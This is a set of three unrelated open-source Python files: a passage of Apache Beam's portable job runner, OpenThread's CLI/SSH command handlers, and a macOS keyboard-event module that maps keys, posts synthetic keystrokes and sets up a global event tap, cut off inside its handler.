    p_options = {'beam:option:' + k + ':v1': (str(v) if type(v) == int else v)
                 for k, v in all_options.items()
                 if v is not None}

    prepare_response = job_service.Prepare(
        beam_job_api_pb2.PrepareJobRequest(
            job_name='job', pipeline=proto_pipeline,
            pipeline_options=job_utils.dict_to_struct(p_options)))
    # Stage job artifacts only when the service advertises a staging endpoint.
    if prepare_response.artifact_staging_endpoint.url:
      stager = portable_stager.PortableStager(
          grpc.insecure_channel(prepare_response.artifact_staging_endpoint.url),
          prepare_response.staging_session_token)
      retrieval_token, _ = stager.stage_job_resources(
          options,
          staging_location='')
    else:
      retrieval_token = None

    try:
      state_stream = job_service.GetStateStream(
          beam_job_api_pb2.GetJobStateRequest(
              job_id=prepare_response.preparation_id))
      # If there's an error, we don't always get it until we try to read.
      # Fortunately, there's always an immediate current state published.
      state_stream = itertools.chain(
          [next(state_stream)],
          state_stream)
      message_stream = job_service.GetMessageStream(
          beam_job_api_pb2.JobMessagesRequest(
              job_id=prepare_response.preparation_id))
    except Exception:
      # TODO(BEAM-6442): Unify preparation_id and job_id for all runners.
      state_stream = message_stream = None

    # Run the job and wait for a result.
    run_response = job_service.Run(
        beam_job_api_pb2.RunJobRequest(
            preparation_id=prepare_response.preparation_id,
            retrieval_token=retrieval_token))

    # Some runners only accept the job_id (not the preparation_id) for the
    # state/message streams; re-request them with the job_id if needed.
    if state_stream is None:
      state_stream = job_service.GetStateStream(
          beam_job_api_pb2.GetJobStateRequest(
              job_id=run_response.job_id))
      message_stream = job_service.GetMessageStream(
          beam_job_api_pb2.JobMessagesRequest(
              job_id=run_response.job_id))

    return PipelineResult(job_service, run_response.job_id, message_stream,
                          state_stream, cleanup_callbacks)
class PortableMetrics(metrics.metric.MetricResults):
    """Placeholder MetricResults for portable pipelines.

    Querying metrics over the Job API is not implemented here, so every
    query yields empty result sets.
    """

    def __init__(self):
        # No state is required; all queries return empty results.
        pass

    def query(self, filter=None):
        """Return an empty result list for each metric kind; `filter` is ignored."""
        return {kind: [] for kind in ('counters', 'distributions', 'gauges')}
class PipelineResult(runner.PipelineResult):
    """Result handle for a job submitted over the portable Job API.

    Wraps the job-service stub so callers can poll state, stream log
    messages, cancel the job, and block until it terminates.
    """

    def __init__(self, job_service, job_id, message_stream, state_stream,
                 cleanup_callbacks=()):
        super(PipelineResult, self).__init__(beam_job_api_pb2.JobState.UNSPECIFIED)
        self._job_service = job_service
        self._job_id = job_id
        # Messages observed so far; appended to by wait_until_finish's reader thread.
        self._messages = []
        self._message_stream = message_stream
        self._state_stream = state_stream
        self._cleanup_callbacks = cleanup_callbacks

    def cancel(self):
        """Ask the job service to cancel the job; cleanup callbacks always run."""
        try:
            self._job_service.Cancel(beam_job_api_pb2.CancelJobRequest(
                job_id=self._job_id))
        finally:
            self._cleanup()

    @property
    def state(self):
        """Fetch the current state from the job service and cache it."""
        runner_api_state = self._job_service.GetState(
            beam_job_api_pb2.GetJobStateRequest(job_id=self._job_id)).state
        self._state = self._runner_api_state_to_pipeline_state(runner_api_state)
        return self._state

    @staticmethod
    def _runner_api_state_to_pipeline_state(runner_api_state):
        # JobState enum names line up with runner.PipelineState attribute names.
        return getattr(runner.PipelineState,
                       beam_job_api_pb2.JobState.Enum.Name(runner_api_state))

    @staticmethod
    def _pipeline_state_to_runner_api_state(pipeline_state):
        return beam_job_api_pb2.JobState.Enum.Value(pipeline_state)

    def metrics(self):
        # Metrics are not yet queryable over the Job API; return the stub.
        return PortableMetrics()

    def _last_error_message(self):
        """Return the text of the most recent JOB_MESSAGE_ERROR, if any."""
        # Keep only entries that carry a message (as opposed to state changes).
        messages = [m.message_response for m in self._messages
                    if m.HasField('message_response')]
        error_messages = [m for m in messages
                          if m.importance ==
                          beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR]
        if error_messages:
            return error_messages[-1].message_text
        else:
            return 'unknown error'

    def wait_until_finish(self):
        """Block until the job reaches a terminal state.

        Returns the final pipeline state, raising RuntimeError (with the last
        error message, if any) when the job did not finish in DONE.
        """
        def read_messages():
            # Drain the message stream in the background, logging as we go.
            for message in self._message_stream:
                if message.HasField('message_response'):
                    logging.log(
                        MESSAGE_LOG_LEVELS[message.message_response.importance],
                        "%s",
                        message.message_response.message_text)
                else:
                    logging.info(
                        "Job state changed to %s",
                        self._runner_api_state_to_pipeline_state(
                            message.state_response.state))
                self._messages.append(message)

        t = threading.Thread(target=read_messages, name='wait_until_finish_read')
        t.daemon = True
        t.start()

        try:
            for state_response in self._state_stream:
                self._state = self._runner_api_state_to_pipeline_state(
                    state_response.state)
                if state_response.state in TERMINAL_STATES:
                    # Wait for any last messages.
                    t.join(10)
                    break
            if self._state != runner.PipelineState.DONE:
                raise RuntimeError(
                    'Pipeline %s failed in state %s: %s' % (
                        self._job_id, self._state, self._last_error_message()))
            return self._state
        finally:
            self._cleanup()

    def _cleanup(self):
        """Run every cleanup callback, then re-raise the last failure (if any).

        BUG FIX: the original used a bare `raise` after the loop, which is
        outside any `except` block and therefore raises
        RuntimeError('No active exception to re-raise') instead of the real
        error.  We keep a reference to the last exception and raise that.
        """
        last_exception = None
        for callback in self._cleanup_callbacks:
            try:
                callback()
            except Exception as exn:
                # Keep going so every callback gets a chance to run.
                last_exception = exn
        self._cleanup_callbacks = ()
        if last_exception is not None:
            raise last_exception
class BeamFnExternalWorkerPoolServicer(
        beam_fn_api_pb2_grpc.BeamFnExternalWorkerPoolServicer):
    """gRPC servicer that spawns SDK harness workers on request.

    Each NotifyRunnerAvailable call starts a daemon thread running an
    SdkHarness connected back to the runner's control endpoint.
    """

    def __init__(self, worker_threads):
        # Number of worker threads each spawned SdkHarness should use.
        self._worker_threads = worker_threads

    @classmethod
    def start(cls, worker_threads=1):
        """Start a gRPC server hosting this servicer.

        Returns:
            (worker_address, worker_server): the 'localhost:<port>' address
            clients should contact, and the running server object so the
            caller can shut it down later.
        """
        worker_server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
        # Port 0 lets the OS pick a free port; add_insecure_port returns it.
        worker_address = 'localhost:%s' % worker_server.add_insecure_port('[::]:0')
        beam_fn_api_pb2_grpc.add_BeamFnExternalWorkerPoolServicer_to_server(
            cls(worker_threads), worker_server)
        worker_server.start()
        return worker_address, worker_server

    def NotifyRunnerAvailable(self, start_worker_request, context):
        """Spawn an SDK harness for the runner identified in the request.

        Any failure is reported via the `error` field of the response rather
        than raised to the gRPC layer.
        """
        try:
            worker = sdk_worker.SdkHarness(
                start_worker_request.control_endpoint.url,
                worker_count=self._worker_threads,
                worker_id=start_worker_request.worker_id)
            worker_thread = threading.Thread(
                name='run_worker_%s' % start_worker_request.worker_id,
                target=worker.run)
            worker_thread.daemon = True
            worker_thread.start()
            return beam_fn_api_pb2.NotifyRunnerAvailableResponse()
        except Exception as exn:
            return beam_fn_api_pb2.NotifyRunnerAvailableResponse(
                error=str(exn))
|
command_handlers.py | #!/usr/bin/env python3
#
# Copyright (c) 2020, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import logging
import queue
import re
import threading
import time
from abc import abstractmethod
from typing import Any, Callable, Optional, Union, List, Pattern
from .connectors import OtCliHandler
from .errors import ExpectLineTimeoutError, CommandError
from .utils import match_line
class OTCommandHandler:
    """Abstract interface for executing OT CLI commands and collecting output."""

    @abstractmethod
    def execute_command(self, cmd: str, timeout: float) -> List[str]:
        """Run one OT CLI command and return its output as a list of lines.

        Implementations must complete within `timeout` seconds.  Returned
        lines carry no trailing '\r\n'; by OT CLI convention the final line
        is 'Done' or 'Error <code>: <msg>'.
        """
        pass

    @abstractmethod
    def close(self):
        """Release any resources held by this command handler."""
        pass

    @abstractmethod
    def wait(self, duration: float) -> List[str]:
        """Sleep for `duration` seconds, returning any lines the CLI printed
        meanwhile.

        OT CLI is normally silent between commands, but it can emit output
        asynchronously (e.g. `Join Success` when a Joiner succeeds).
        """
        pass

    @abstractmethod
    def set_line_read_callback(self, callback: Optional[Callable[[str], Any]]):
        """Register `callback` to be invoked with every line the CLI outputs.

        Useful for observing asynchronous output while other commands are
        still being executed.
        """
        pass

    def shell(self, cmd: str, timeout: float) -> List[str]:
        # Only handlers backed by a real shell (e.g. SSH) can support this.
        raise NotImplementedError("shell command is not supported on %s" % self.__class__.__name__)
class OtCliCommandRunner(OTCommandHandler):
    """OTCommandHandler that drives an OT CLI (or spinel-cli) over an OtCliHandler."""

    __PATTERN_COMMAND_DONE_OR_ERROR = re.compile(
        r'(Done|Error|Error \d+:.*|.*: command not found)$')  # "Error" for spinel-cli.py

    __PATTERN_LOG_LINE = re.compile(r'((\[(NONE|CRIT|WARN|NOTE|INFO|DEBG)\])'
                                    r'|(-.*-+: )'  # e.g. -CLI-----:
                                    r'|(\[[DINWC\-]\] (?=[\w\-]{14}:)\w+-*:)'  # e.g. [I] Mac-----------:
                                    r')')
    """regex used to filter logs"""

    assert __PATTERN_LOG_LINE.match('[I] ChannelMonitor: debug log')
    assert __PATTERN_LOG_LINE.match('[I] Mac-----------: info log')
    assert __PATTERN_LOG_LINE.match('[N] MeshForwarder-: note log')
    assert __PATTERN_LOG_LINE.match('[W] Notifier------: warn log')
    assert __PATTERN_LOG_LINE.match('[C] Mle-----------: critical log')
    assert __PATTERN_LOG_LINE.match('[-] Settings------: none log')
    assert not __PATTERN_LOG_LINE.match('[-] Settings-----: none log')  # not enough `-` after module name

    # Commands whose final 'Done' arrives asynchronously, possibly much later.
    __ASYNC_COMMANDS = {'scan', 'ping', 'discover'}

    def __init__(self, otcli: OtCliHandler, is_spinel_cli=False):
        self.__otcli: OtCliHandler = otcli
        self.__is_spinel_cli = is_spinel_cli
        # OT CLI echoes the command back; spinel-cli does not.
        self.__expect_command_echoback = not self.__is_spinel_cli
        self.__line_read_callback = None

        # Lines read from the CLI that have not yet been consumed by a command.
        self.__pending_lines = queue.Queue()
        self.__should_close = threading.Event()
        self.__otcli_reader = threading.Thread(target=self.__otcli_read_routine)
        # Use the `daemon` attribute instead of the deprecated setDaemon().
        self.__otcli_reader.daemon = True
        self.__otcli_reader.start()

    def __repr__(self):
        return repr(self.__otcli)

    def execute_command(self, cmd, timeout=10) -> List[str]:
        """Send `cmd` to the CLI and collect output until Done/Error."""
        assert not self.__should_close.is_set(), "OT CLI is already closed."
        self.__otcli.writeline(cmd)

        if cmd in ('reset', 'factoryreset'):
            # A reset produces no Done line; give the device time to reboot,
            # then poke it with 'extaddr' to resynchronize the stream.
            self.wait(3)
            self.__otcli.writeline('extaddr')
            self.wait(1)
            return []

        if self.__expect_command_echoback:
            self.__expect_line(timeout, cmd)

        output = self.__expect_line(timeout,
                                    OtCliCommandRunner.__PATTERN_COMMAND_DONE_OR_ERROR,
                                    asynchronous=cmd.split()[0] in OtCliCommandRunner.__ASYNC_COMMANDS)
        return output

    def wait(self, duration: float) -> List[str]:
        """Wait `duration` seconds and drain any lines the CLI produced."""
        self.__otcli.wait(duration)

        output = []
        try:
            while True:
                line = self.__pending_lines.get_nowait()
                output.append(line)
        except queue.Empty:
            pass

        return output

    def close(self):
        """Stop the reader thread and close the underlying CLI handler."""
        self.__should_close.set()
        self.__otcli.close()
        self.__otcli_reader.join()

    def set_line_read_callback(self, callback: Optional[Callable[[str], Any]]):
        self.__line_read_callback = callback

    #
    # Private methods
    #

    def __expect_line(self, timeout: float, expect_line: Union[str, Pattern], asynchronous=False) -> List[str]:
        """Collect lines until one matches `expect_line` or `timeout` elapses.

        In asynchronous mode the timeout is polled in one-second slices so
        output produced while waiting is still captured.
        """
        output = []

        if not asynchronous:
            while True:
                try:
                    line = self.__pending_lines.get(timeout=timeout)
                except queue.Empty:
                    raise ExpectLineTimeoutError(expect_line)

                output.append(line)

                if match_line(line, expect_line):
                    break
        else:
            done = False
            while not done and timeout > 0:
                lines = self.wait(1)
                timeout -= 1

                for line in lines:
                    output.append(line)

                    if match_line(line, expect_line):
                        done = True
                        break

            if not done:
                raise ExpectLineTimeoutError(expect_line)

        return output

    def __otcli_read_routine(self):
        """Reader-thread loop: read CLI lines, strip prompts, filter logs."""
        while not self.__should_close.is_set():
            try:
                line = self.__otcli.readline()
            except Exception:
                # A read error during shutdown is expected; otherwise re-raise.
                if self.__should_close.is_set():
                    break
                else:
                    raise

            logging.debug('%s: %r', self.__otcli, line)

            if line is None:
                break

            # Strip the interactive prompt, if present.
            if line.startswith('> '):
                line = line[2:]

            if self.__line_read_callback is not None:
                self.__line_read_callback(line)

            logging.debug('%s: %s', self.__otcli, line)

            # Log lines are filtered out; everything else is queued for commands.
            if not OtCliCommandRunner.__PATTERN_LOG_LINE.match(line):
                self.__pending_lines.put(line)
class OtbrSshCommandRunner(OTCommandHandler):
    """Runs OT commands on a border router over SSH by invoking `ot-ctl`."""

    def __init__(self, host, port, username, password, sudo):
        import paramiko

        self.__host = host
        self.__port = port
        self.__sudo = sudo
        self.__line_read_callback = None

        self.__ssh = paramiko.SSHClient()
        self.__ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

        try:
            self.__ssh.connect(host,
                               port=port,
                               username=username,
                               password=password,
                               allow_agent=False,
                               look_for_keys=False)
        except paramiko.ssh_exception.AuthenticationException:
            if password:
                raise
            # With an empty password, fall back to "none" authentication.
            self.__ssh.get_transport().auth_none(username)

    def __repr__(self):
        return f'{self.__host}:{self.__port}'

    def execute_command(self, cmd: str, timeout: float) -> List[str]:
        """Run `ot-ctl <cmd>` remotely (with sudo if configured) and return its lines."""
        sh_cmd = f'ot-ctl {cmd}'
        if self.__sudo:
            sh_cmd = 'sudo ' + sh_cmd

        output = self.shell(sh_cmd, timeout=timeout)

        callback = self.__line_read_callback
        if callback is not None:
            for line in output:
                callback(line)

        if cmd in ('reset', 'factoryreset'):
            # Give the device time to come back after a reset.
            self.wait(3)

        return output

    def shell(self, cmd: str, timeout: float) -> List[str]:
        """Execute an arbitrary shell command; raise CommandError if stderr is non-empty."""
        _, cmd_out, cmd_err = self.__ssh.exec_command(cmd, timeout=int(timeout), bufsize=1024)
        errput = [line.rstrip('\r\n') for line in cmd_err.readlines()]
        output = [line.rstrip('\r\n') for line in cmd_out.readlines()]
        if errput:
            raise CommandError(cmd, errput)

        return output

    def close(self):
        self.__ssh.close()

    def wait(self, duration: float) -> List[str]:
        # SSH-backed ot-ctl has no asynchronous output between calls; just sleep.
        time.sleep(duration)
        return []

    def set_line_read_callback(self, callback: Optional[Callable[[str], Any]]):
        self.__line_read_callback = callback
|
_darwinkeyboard.py | import ctypes
import ctypes.util
import Quartz
import time
import os
import threading
from AppKit import NSEvent
from ._keyboard_event import KeyboardEvent, KEY_DOWN, KEY_UP, normalize_name
try:  # Python 2/3 compatibility
    unichr
except NameError:
    # Python 3 removed unichr(); chr() is the equivalent.
    unichr = chr

# Load the Carbon framework, which provides the (deprecated) Text Input
# Source / keyboard-layout APIs used by KeyMap below.
Carbon = ctypes.cdll.LoadLibrary(ctypes.util.find_library('Carbon'))
class KeyMap(object):
    """Maps macOS virtual key codes to key names/characters and back.

    `non_layout_keys` covers keys whose meaning does not depend on the
    keyboard layout (modifiers, function keys, navigation).
    `layout_specific_keys` maps vk -> (unshifted_char, shifted_char) and is
    populated in __init__ by querying the current layout through the
    (supposedly deprecated) Carbon TIS/UCKeyTranslate APIs.
    """

    # Key codes from https://stackoverflow.com/a/16125341/252218
    # Unfortunately no source for layout-independent keys was found.
    non_layout_keys = dict((vk, normalize_name(name)) for vk, name in {
        0x24: 'return',
        0x30: 'tab',
        0x31: 'space',
        0x33: 'delete',
        0x35: 'escape',
        0x37: 'command',
        0x38: 'shift',
        0x39: 'capslock',
        0x3a: 'option',
        0x3b: 'control',
        0x3c: 'right shift',
        0x3d: 'right option',
        0x3e: 'right control',
        0x3f: 'function',
        0x40: 'f17',
        0x48: 'volume up',
        0x49: 'volume down',
        0x4a: 'mute',
        0x4f: 'f18',
        0x50: 'f19',
        0x5a: 'f20',
        0x60: 'f5',
        0x61: 'f6',
        0x62: 'f7',
        0x63: 'f3',
        0x64: 'f8',
        0x65: 'f9',
        0x67: 'f11',
        0x69: 'f13',
        0x6a: 'f16',
        0x6b: 'f14',
        0x6d: 'f10',
        0x6f: 'f12',
        0x71: 'f15',
        0x72: 'help',
        0x73: 'home',
        0x74: 'page up',
        0x75: 'forward delete',
        0x76: 'f4',
        0x77: 'end',
        0x78: 'f2',
        0x79: 'page down',
        0x7a: 'f1',
        0x7b: 'left',
        0x7c: 'right',
        0x7d: 'down',
        0x7e: 'up',
    }.items())
    # Filled in __init__ from the active keyboard layout.
    layout_specific_keys = {}

    def __init__(self):
        # Virtual key codes are usually the same for any given key, unless you have a different
        # keyboard layout. The only way I've found to determine the layout relies on (supposedly
        # deprecated) Carbon APIs. If there's a more modern way to do this, please update this
        # section.

        # Set up data types and exported values:
        CFTypeRef = ctypes.c_void_p
        CFDataRef = ctypes.c_void_p
        CFIndex = ctypes.c_uint64
        OptionBits = ctypes.c_uint32
        UniCharCount = ctypes.c_uint8
        UniChar = ctypes.c_uint16
        UniChar4 = UniChar * 4

        class CFRange(ctypes.Structure):
            _fields_ = [('loc', CFIndex),
                        ('len', CFIndex)]

        kTISPropertyUnicodeKeyLayoutData = ctypes.c_void_p.in_dll(Carbon, 'kTISPropertyUnicodeKeyLayoutData')
        shiftKey = 0x0200
        alphaKey = 0x0400
        optionKey = 0x0800
        controlKey = 0x1000
        kUCKeyActionDisplay = 3
        kUCKeyTranslateNoDeadKeysBit = 0

        # Set up function calls:
        Carbon.CFDataGetBytes.argtypes = [CFDataRef]  # , CFRange, UInt8
        Carbon.CFDataGetBytes.restype = None
        Carbon.CFDataGetLength.argtypes = [CFDataRef]
        Carbon.CFDataGetLength.restype = CFIndex
        Carbon.CFRelease.argtypes = [CFTypeRef]
        Carbon.CFRelease.restype = None
        Carbon.LMGetKbdType.argtypes = []
        Carbon.LMGetKbdType.restype = ctypes.c_uint32
        Carbon.TISCopyCurrentKeyboardInputSource.argtypes = []
        Carbon.TISCopyCurrentKeyboardInputSource.restype = ctypes.c_void_p
        Carbon.TISCopyCurrentASCIICapableKeyboardLayoutInputSource.argtypes = []
        Carbon.TISCopyCurrentASCIICapableKeyboardLayoutInputSource.restype = ctypes.c_void_p
        Carbon.TISGetInputSourceProperty.argtypes = [ctypes.c_void_p, ctypes.c_void_p]
        Carbon.TISGetInputSourceProperty.restype = ctypes.c_void_p
        Carbon.UCKeyTranslate.argtypes = [ctypes.c_void_p,
                                          ctypes.c_uint16,
                                          ctypes.c_uint16,
                                          ctypes.c_uint32,
                                          ctypes.c_uint32,
                                          OptionBits,  # keyTranslateOptions
                                          ctypes.POINTER(ctypes.c_uint32),  # deadKeyState
                                          UniCharCount,  # maxStringLength
                                          ctypes.POINTER(UniCharCount),  # actualStringLength
                                          UniChar4]
        Carbon.UCKeyTranslate.restype = ctypes.c_uint32

        # Get keyboard layout; fall back to an ASCII-capable layout when the
        # current input source has no layout data (e.g. some IMEs).
        klis = Carbon.TISCopyCurrentKeyboardInputSource()
        k_layout = Carbon.TISGetInputSourceProperty(klis, kTISPropertyUnicodeKeyLayoutData)
        if k_layout is None:
            klis = Carbon.TISCopyCurrentASCIICapableKeyboardLayoutInputSource()
            k_layout = Carbon.TISGetInputSourceProperty(klis, kTISPropertyUnicodeKeyLayoutData)
        k_layout_size = Carbon.CFDataGetLength(k_layout)
        k_layout_buffer = ctypes.create_string_buffer(k_layout_size)  # TODO - Verify this works instead of initializing with empty string
        Carbon.CFDataGetBytes(k_layout, CFRange(0, k_layout_size), ctypes.byref(k_layout_buffer))

        # Generate character representations of key codes
        for key_code in range(0, 128):
            # TODO - Possibly add alt modifier to key map
            non_shifted_char = UniChar4()
            shifted_char = UniChar4()
            keys_down = ctypes.c_uint32()
            char_count = UniCharCount()
            retval = Carbon.UCKeyTranslate(k_layout_buffer,
                                           key_code,
                                           kUCKeyActionDisplay,
                                           0,  # No modifier
                                           Carbon.LMGetKbdType(),
                                           kUCKeyTranslateNoDeadKeysBit,
                                           ctypes.byref(keys_down),
                                           4,
                                           ctypes.byref(char_count),
                                           non_shifted_char)
            non_shifted_key = u''.join(unichr(non_shifted_char[i]) for i in range(char_count.value))
            retval = Carbon.UCKeyTranslate(k_layout_buffer,
                                           key_code,
                                           kUCKeyActionDisplay,
                                           shiftKey >> 8,  # Shift
                                           Carbon.LMGetKbdType(),
                                           kUCKeyTranslateNoDeadKeysBit,
                                           ctypes.byref(keys_down),
                                           4,
                                           ctypes.byref(char_count),
                                           shifted_char)
            shifted_key = u''.join(unichr(shifted_char[i]) for i in range(char_count.value))
            self.layout_specific_keys[key_code] = (non_shifted_key, shifted_key)
        # Cleanup
        Carbon.CFRelease(klis)

    def character_to_vk(self, character):
        """ Returns a tuple of (scan_code, modifiers) where ``scan_code`` is a numeric scan code
        and ``modifiers`` is an array of string modifier names (like 'shift') """
        for vk in self.non_layout_keys:
            if self.non_layout_keys[vk] == character.lower():
                return (vk, [])
        for vk in self.layout_specific_keys:
            if self.layout_specific_keys[vk][0] == character:
                return (vk, [])
            elif self.layout_specific_keys[vk][1] == character:
                return (vk, ['shift'])
        raise ValueError("Unrecognized character: {}".format(character))

    def vk_to_character(self, vk, modifiers=()):
        """ Returns a character corresponding to the specified scan code (with given
        modifiers applied)

        Note: the default was changed from a mutable list (``[]``) to a tuple;
        `modifiers` is only read (via ``in``), so callers passing lists are
        unaffected.
        """
        if vk in self.non_layout_keys:
            # Not a character
            return self.non_layout_keys[vk]
        elif vk in self.layout_specific_keys:
            if 'shift' in modifiers:
                return self.layout_specific_keys[vk][1]
            return self.layout_specific_keys[vk][0]
        else:
            # Invalid vk
            raise ValueError("Invalid scan code: {}".format(vk))
class KeyController(object):
    """Posts synthetic keyboard events (regular and media keys) via Quartz.

    Tracks which modifier keys are currently held so that subsequent key
    events carry the correct modifier flags.
    """

    def __init__(self):
        self.key_map = KeyMap()
        # Modifier state, updated by press()/release() of the modifier keys.
        self.current_modifiers = {
            "shift": False,
            "caps": False,
            "alt": False,
            "ctrl": False,
            "cmd": False,
        }
        # Media keys are addressed as 128 + value in this module's scan codes.
        self.media_keys = {
            'KEYTYPE_SOUND_UP': 0,
            'KEYTYPE_SOUND_DOWN': 1,
            'KEYTYPE_BRIGHTNESS_UP': 2,
            'KEYTYPE_BRIGHTNESS_DOWN': 3,
            'KEYTYPE_CAPS_LOCK': 4,
            'KEYTYPE_HELP': 5,
            'POWER_KEY': 6,
            'KEYTYPE_MUTE': 7,
            'UP_ARROW_KEY': 8,
            'DOWN_ARROW_KEY': 9,
            'KEYTYPE_NUM_LOCK': 10,
            'KEYTYPE_CONTRAST_UP': 11,
            'KEYTYPE_CONTRAST_DOWN': 12,
            'KEYTYPE_LAUNCH_PANEL': 13,
            'KEYTYPE_EJECT': 14,
            'KEYTYPE_VIDMIRROR': 15,
            'KEYTYPE_PLAY': 16,
            'KEYTYPE_NEXT': 17,
            'KEYTYPE_PREVIOUS': 18,
            'KEYTYPE_FAST': 19,
            'KEYTYPE_REWIND': 20,
            'KEYTYPE_ILLUMINATION_UP': 21,
            'KEYTYPE_ILLUMINATION_DOWN': 22,
            'KEYTYPE_ILLUMINATION_TOGGLE': 23
        }

    def press(self, key_code):
        """ Sends a 'down' event for the specified scan code """
        if key_code >= 128:
            # Media key: must be posted as an NSEvent "system defined" event.
            ev = NSEvent.otherEventWithType_location_modifierFlags_timestamp_windowNumber_context_subtype_data1_data2_(
                14,  # type
                (0, 0),  # location
                0xa00,  # flags
                0,  # timestamp
                0,  # window
                0,  # ctx
                8,  # subtype
                ((key_code-128) << 16) | (0xa << 8),  # data1
                -1  # data2
            )
            Quartz.CGEventPost(0, ev.CGEvent())
        else:
            # Regular key
            # Apply modifiers if necessary
            event_flags = 0
            if self.current_modifiers["shift"]:
                event_flags += Quartz.kCGEventFlagMaskShift
            if self.current_modifiers["caps"]:
                event_flags += Quartz.kCGEventFlagMaskAlphaShift
            if self.current_modifiers["alt"]:
                event_flags += Quartz.kCGEventFlagMaskAlternate
            if self.current_modifiers["ctrl"]:
                event_flags += Quartz.kCGEventFlagMaskControl
            if self.current_modifiers["cmd"]:
                event_flags += Quartz.kCGEventFlagMaskCommand

            # Update modifiers if necessary
            if key_code == 0x37:  # cmd
                self.current_modifiers["cmd"] = True
            elif key_code == 0x38:  # shift
                self.current_modifiers["shift"] = True
            elif key_code == 0x39:  # caps lock
                self.current_modifiers["caps"] = True
            elif key_code == 0x3A:  # alt
                self.current_modifiers["alt"] = True
            elif key_code == 0x3B:  # ctrl
                self.current_modifiers["ctrl"] = True
            event = Quartz.CGEventCreateKeyboardEvent(None, key_code, True)
            Quartz.CGEventSetFlags(event, event_flags)
            Quartz.CGEventPost(Quartz.kCGHIDEventTap, event)
            time.sleep(0.01)

    def release(self, key_code):
        """ Sends an 'up' event for the specified scan code """
        if key_code >= 128:
            # Media key (note the 0xb "up" nibble vs 0xa for "down").
            ev = NSEvent.otherEventWithType_location_modifierFlags_timestamp_windowNumber_context_subtype_data1_data2_(
                14,  # type
                (0, 0),  # location
                0xb00,  # flags
                0,  # timestamp
                0,  # window
                0,  # ctx
                8,  # subtype
                ((key_code-128) << 16) | (0xb << 8),  # data1
                -1  # data2
            )
            Quartz.CGEventPost(0, ev.CGEvent())
        else:
            # Regular key
            # Update modifiers if necessary
            if key_code == 0x37:  # cmd
                self.current_modifiers["cmd"] = False
            elif key_code == 0x38:  # shift
                self.current_modifiers["shift"] = False
            elif key_code == 0x39:  # caps lock
                self.current_modifiers["caps"] = False
            elif key_code == 0x3A:  # alt
                self.current_modifiers["alt"] = False
            elif key_code == 0x3B:  # ctrl
                self.current_modifiers["ctrl"] = False

            # Apply modifiers if necessary
            event_flags = 0
            if self.current_modifiers["shift"]:
                event_flags += Quartz.kCGEventFlagMaskShift
            if self.current_modifiers["caps"]:
                event_flags += Quartz.kCGEventFlagMaskAlphaShift
            if self.current_modifiers["alt"]:
                event_flags += Quartz.kCGEventFlagMaskAlternate
            if self.current_modifiers["ctrl"]:
                event_flags += Quartz.kCGEventFlagMaskControl
            if self.current_modifiers["cmd"]:
                event_flags += Quartz.kCGEventFlagMaskCommand
            event = Quartz.CGEventCreateKeyboardEvent(None, key_code, False)
            Quartz.CGEventSetFlags(event, event_flags)
            Quartz.CGEventPost(Quartz.kCGHIDEventTap, event)
            time.sleep(0.01)

    def map_char(self, character):
        """Return (scan_code, modifiers) for a character or media-key name."""
        if character in self.media_keys:
            return (128 + self.media_keys[character], [])
        else:
            return self.key_map.character_to_vk(character)

    def map_scan_code(self, scan_code):
        """Return the media-key name or character for a scan code.

        BUG FIX: the original iterated ``enumerate(self.media_keys)``, which
        yields (index, key_name) pairs, and compared the *name* against an
        int — so media keys could never be resolved.  We look up by value in
        the dict instead.
        """
        if scan_code >= 128:
            matches = [name for name, code in self.media_keys.items()
                       if code == scan_code - 128]
            if matches:
                return matches[0]
            return None
        else:
            return self.key_map.vk_to_character(scan_code)
class KeyEventListener(object):
    """Listens for global keyboard events via a Quartz event tap.

    Intended to be run on a background thread via run().
    """

    def __init__(self, callback, blocking=False):
        # When blocking is True, handler() returns None so tapped events are
        # swallowed instead of being delivered to other applications.
        self.blocking = blocking
        self.callback = callback
        self.listening = True
        self.tap = None

    def run(self):
        """ Creates a listener and loops while waiting for an event. Intended to run as
        a background thread. """
        self.tap = Quartz.CGEventTapCreate(
            Quartz.kCGSessionEventTap,
            Quartz.kCGHeadInsertEventTap,
            Quartz.kCGEventTapOptionDefault,
            Quartz.CGEventMaskBit(Quartz.kCGEventKeyDown) |
            Quartz.CGEventMaskBit(Quartz.kCGEventKeyUp) |
            Quartz.CGEventMaskBit(Quartz.kCGEventFlagsChanged),
            self.handler,
            None)
        loopsource = Quartz.CFMachPortCreateRunLoopSource(None, self.tap, 0)
        loop = Quartz.CFRunLoopGetCurrent()
        Quartz.CFRunLoopAddSource(loop, loopsource, Quartz.kCFRunLoopDefaultMode)
        Quartz.CGEventTapEnable(self.tap, True)
        while self.listening:
            # Run the loop in 5-second slices so self.listening is re-checked
            # periodically and the thread can exit.
            Quartz.CFRunLoopRunInMode(Quartz.kCFRunLoopDefaultMode, 5, False)

    def handler(self, proxy, e_type, event, refcon):
        """Event-tap callback: translate a Quartz event into a KeyboardEvent."""
